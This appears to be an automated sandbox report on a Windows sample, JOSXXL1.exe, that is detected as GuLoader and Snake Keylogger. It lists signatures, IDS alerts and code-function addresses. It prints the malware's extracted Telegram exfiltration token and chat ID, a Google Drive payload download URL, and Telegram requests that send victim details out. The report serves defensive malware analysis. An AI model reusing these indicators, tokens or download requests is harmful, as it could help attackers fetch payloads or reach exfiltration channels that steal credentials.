
Windows Analysis Report
JOSXXL1.exe

Overview

General Information

Sample name: JOSXXL1.exe
Analysis ID: 1542950
MD5: fb24966daab46af066a7b7c041236de9
SHA1: 391bb0f3da952bbbf14b61b7f6c01175344be882
SHA256: 8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
Tags: exe, user-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • JOSXXL1.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\JOSXXL1.exe" MD5: FB24966DAAB46AF066A7B7C041236DE9)
    • JOSXXL1.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\JOSXXL1.exe" MD5: FB24966DAAB46AF066A7B7C041236DE9)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: JOSXXL1.exe PID: 3492 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: JOSXXL1.exe PID: 3492 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T23:57:21.167832+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61902 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:22.626862+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61913 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:24.129743+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61922 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:25.708387+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61933 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:27.148944+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61945 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:31.552767+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 61976 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:18.573757+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 61886 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:20.417495+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 61886 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:21.890371+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 61908 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:23.355007+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 61919 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:11.745999+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 61847 | 142.250.185.238 | 443 | TCP

AV Detection

Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}
Source: JOSXXL1.exe | ReversingLabs: Detection: 57%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_39D787A8 CryptUnprotectData
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_39D78EF1 CryptUnprotectData
Source: JOSXXL1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2
Source: JOSXXL1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 0_2_00405974 CloseHandle, GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 0_2_004064C6 FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 0_2_004027FB FindFirstFileW
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_00405974 CloseHandle, GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_004064C6 FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_004027FB FindFirstFileW
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\JOSXXL1.exe | File opened: C:\Users\user\AppData\Local\Microsoft

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61886 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61919 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61908 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:61847 -> 142.250.185.238:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61922 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61902 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61933 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61945 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61913 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61976 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sat, 26 Oct 2024 21:57:32 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2
            Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\JOSXXL1.exe | Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C5B484_2_3A7C5B48
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C96484_2_3A7C9648
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C3B494_2_3A7C3B49
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CEC4B4_2_3A7CEC4B
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CC1444_2_3A7CC144
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C00404_2_3A7C0040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C6B404_2_3A7C6B40
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C32384_2_3A7C3238
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CD9384_2_3A7CD938
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C5B394_2_3A7C5B39
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C96374_2_3A7C9637
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CAE304_2_3A7CAE30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C6B304_2_3A7C6B30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C52284_2_3A7C5228
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C83284_2_3A7C8328
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CD9274_2_3A7CD927
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CF1204_2_3A7CF120
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C66214_2_3A7C6621
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C521C4_2_3A7C521C
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CAE1F4_2_3A7CAE1F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C29184_2_3A7C2918
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CC6184_2_3A7CC618
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C83194_2_3A7C8319
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C17104_2_3A7C1710
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C9B104_2_3A7C9B10
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CF1114_2_3A7CF111
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C660F4_2_3A7C660F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C49084_2_3A7C4908
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C70084_2_3A7C7008
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CC6084_2_3A7CC608
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CDE004_2_3A7CDE00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C16FF4_2_3A7C16FF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C9AFF4_2_3A7C9AFF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C1FF84_2_3A7C1FF8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CB2F84_2_3A7CB2F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C6FFB4_2_3A7C6FFB
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C48F74_2_3A7C48F7
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C0DF04_2_3A7C0DF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C87F04_2_3A7C87F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CDDF04_2_3A7CDDF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C3FE84_2_3A7C3FE8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CF5E84_2_3A7CF5E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C1FE84_2_3A7C1FE8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CB2E84_2_3A7CB2E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CCAE04_2_3A7CCAE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C0DE04_2_3A7C0DE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C87E04_2_3A7C87E0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C5FD84_2_3A7C5FD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C9FD84_2_3A7C9FD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C3FD84_2_3A7C3FD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CF5D74_2_3A7CF5D7
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C04D04_2_3A7C04D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C74D04_2_3A7C74D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CCAD14_2_3A7CCAD1
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C9FCC4_2_3A7C9FCC
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CE2C84_2_3A7CE2C8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C5FC74_2_3A7C5FC7
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CB7C04_2_3A7CB7C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C04C04_2_3A7C04C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C74BF4_2_3A7C74BF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C8CB84_2_3A7C8CB8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CE2B84_2_3A7CE2B8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CB7B44_2_3A7CB7B4
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CFAB04_2_3A7CFAB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C2DA84_2_3A7C2DA8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CCFA84_2_3A7CCFA8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C56A84_2_3A7C56A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C8CA94_2_3A7C8CA9
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CCFA64_2_3A7CCFA6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C1BA04_2_3A7C1BA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CA4A04_2_3A7CA4A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CFAA04_2_3A7CFAA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C4D984_2_3A7C4D98
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C79984_2_3A7C7998
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CE7904_2_3A7CE790
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C1B914_2_3A7C1B91
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CA48F4_2_3A7CA48F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C24884_2_3A7C2488
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7CBC884_2_3A7CBC88
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C79884_2_3A7C7988
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C4D894_2_3A7C4D89
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C12804_2_3A7C1280
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7C91804_2_3A7C9180
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7FEE484_2_3A7FEE48
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F70C04_2_3A7F70C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7FD7104_2_3A7FD710
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F4E604_2_3A7F4E60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F1C604_2_3A7F1C60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F64404_2_3A7F6440
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F32404_2_3A7F3240
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F00404_2_3A7F0040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F00384_2_3A7F0038
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F48204_2_3A7F4820
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F16204_2_3A7F1620
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F5E004_2_3A7F5E00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F2C004_2_3A7F2C00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F5AE04_2_3A7F5AE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F28E04_2_3A7F28E0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F28CF4_2_3A7F28CF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F3EC04_2_3A7F3EC0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F0CC04_2_3A7F0CC0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F54A04_2_3A7F54A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F22A04_2_3A7F22A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F38804_2_3A7F3880
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F06804_2_3A7F0680
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F6A804_2_3A7F6A80
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A7F67604_2_3A7F6760
